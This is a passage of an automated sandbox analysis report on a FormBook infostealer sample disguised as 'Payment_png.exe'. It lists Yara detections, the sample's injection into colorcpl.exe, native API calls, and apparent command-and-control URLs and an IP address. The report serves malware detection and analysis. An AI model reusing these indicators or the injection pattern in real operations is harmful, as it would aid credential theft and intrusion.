      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.pcpartout.com/c8bs/
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.pcpartout.com/c8bs/www.birkenhof-allgaeu.net
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.pcpartout.comReferer:
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.plowbrothers.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.plowbrothers.com/c8bs/
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.plowbrothers.com/c8bs/www.slutefuter.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.plowbrothers.comReferer:
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.quantify-co.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.quantify-co.com/c8bs/
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.quantify-co.com/c8bs/M
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.quantify-co.comReferer:
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.silverdollarcafe.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.silverdollarcafe.com/c8bs/
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.silverdollarcafe.com/c8bs/www.domentemenegi42.net
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.silverdollarcafe.comReferer:
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.slutefuter.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.slutefuter.com/c8bs/
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.slutefuter.com/c8bs/www.loversdeal.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.slutefuter.comReferer:
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.uforservice.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.uforservice.com/c8bs/
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.uforservice.com/c8bs/www.domennyarendi39.net
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.uforservice.comReferer:
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownHTTPS traffic detected: 170.249.199.106:443 -> 192.168.2.3:49714 version: TLS 1.2
      Source: C:\Windows\explorer.exeCode function: 6_2_06136EB2 OpenClipboard,

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.472974211.0000000005117000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.470737147.0000000003032000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Executable has a suspicious name (potential lure to open the executable)Show sources
      Source: Payment_png.exeStatic file information: Suspicious name
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: Payment_png.exe
      Source: C:\Users\user\Desktop\Payment_png.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02220438 EnumWindows,NtSetInformationThread,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02224EE8 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02225331 NtMapViewOfSection,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02220F83 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02222992 NtSetInformationThread,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02221E27 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_0222542F NtMapViewOfSection,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02222033 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_022220A1 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_022204AF NtSetInformationThread,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02221AB4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02221E81 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_022254F5 NtMapViewOfSection,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_022254CB NtMapViewOfSection,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_022204D5 NtSetInformationThread,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02221F21 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02225338 NtMapViewOfSection,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02225301 NtMapViewOfSection,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02221369 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02225544 NtMapViewOfSection,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_022253B4 NtMapViewOfSection,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02222183 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02225380 NtMapViewOfSection,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02221986 NtSetInformationThread,NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02221F93 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_02221DEB NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 0_2_022253EF NtMapViewOfSection,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9540 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E95D0 NtClose,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E98F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E99A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9610 NtEnumerateValueKey,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9670 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9650 NtQueryValueKey,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E96D0 NtCreateKey,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9730 NtQueryVirtualMemory,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3EA710 NtOpenProcessToken,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3EA770 NtOpenThread,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9770 NtSetInformationFile,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9760 NtOpenProcess,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3EAD30 NtSetContextThread,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9520 NtWaitForSingleObject,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9560 NtWriteFile,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E95F0 NtQueryInformationFile,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9A10 NtQuerySection,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9A80 NtOpenDirectoryObject,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9B00 NtSetValueKey,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3EA3B0 NtGetContextThread,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9820 NtEnumerateKey,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3EB040 NtSuspendThread,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E98A0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E9950 NtQueueApcThread,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E99D0 NtCreateProcessEx,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_00565331 NtSetInformationThread,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_00564EE8 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_00565301 NtSetInformationThread,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_00565338 NtSetInformationThread,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_005653EF NtSetInformationThread,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_00565380 NtSetInformationThread,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_005653B4 NtSetInformationThread,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_0056542F NtSetInformationThread,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_005654CB NtSetInformationThread,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_005654F5 NtSetInformationThread,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_00565544 NtSetInformationThread,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C495D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C496D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C496E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C499A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C495F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49560 NtWriteFile,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C4AD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49610 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C497A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C4A770 NtOpenThread,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49770 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C4A710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C498F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C498A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C4B040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C499D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C4A3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C49B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_009681C0 NtCreateFile,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_009682F0 NtClose,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_00968270 NtReadFile,
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_009683A0 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C6E30
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46D616
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E472EF7
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E47DFCE
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E471FF1
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46D466
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B841F
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB477
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464496
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E471D55
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A0D20
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E472D07
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4725DD
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D2581
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E462D82
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BD5E0
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E45FA2B
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4722AE
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E44CB4F
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E472B28
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CAB40
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DEBB0
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46DBD2
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4603DA
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4523E3
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D138B
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DABD8
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA830
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E461002
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E47E824
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D20A0
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BB090
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4728EC
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4720A8
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C4120
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AF900
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF
      Source: C:\Windows\explorer.exeCode function: 6_2_0613A062
      Source: C:\Windows\explorer.exeCode function: 6_2_061358F9
      Source: C:\Windows\explorer.exeCode function: 6_2_061382FF
      Source: C:\Windows\explorer.exeCode function: 6_2_06135902
      Source: C:\Windows\explorer.exeCode function: 6_2_06138302
      Source: C:\Windows\explorer.exeCode function: 6_2_06136362
      Source: C:\Windows\explorer.exeCode function: 6_2_0613C5B2
      Source: C:\Windows\explorer.exeCode function: 6_2_0613B7C7
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC4496
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CCD466
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C2B477
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C1841F
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CD25DD
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C1D5E0
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C32581
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC2D82
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CD1D55
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CD2D07
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C00D20
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CD2EF7
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CCD616
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C26E30
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CDDFCE
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CD1FF1
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CD28EC
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C1B090
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C320A0
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CD20A8
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC1002
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CDE824
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C2A830
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C299BF
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C0F900
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C24120
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC4AEF
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CD22AE
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CBFA2B
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C2B236
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CC03DA
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C3ABD8
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CCDBD2
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CB23E3
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C3138B
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C3EBB0
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C2AB40
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CACB4F
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04C2A309
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04CD2B28
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_00958C5B
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_00958C60
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_00952D90
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_00952D8F
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_00952FB0
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: String function: 1E3AB150 appears 136 times
      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04C0B150 appears 136 times
      Source: Payment_png.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Payment_png.exe, 00000000.00000000.200466328.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenametempelhallerne.exe vs Payment_png.exe
      Source: Payment_png.exe, 00000002.00000002.313895649.000000001DC50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs Payment_png.exe
      Source: Payment_png.exe, 00000002.00000002.313927300.000000001DEF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Payment_png.exe
      Source: Payment_png.exe, 00000002.00000002.305998798.00000000000B3000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs Payment_png.exe
      Source: Payment_png.exe, 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment_png.exe
      Source: Payment_png.exe, 00000002.00000000.245916312.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenametempelhallerne.exe vs Payment_png.exe
      Source: Payment_png.exeBinary or memory string: OriginalFilenametempelhallerne.exe vs Payment_png.exe
      Source: Payment_png.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
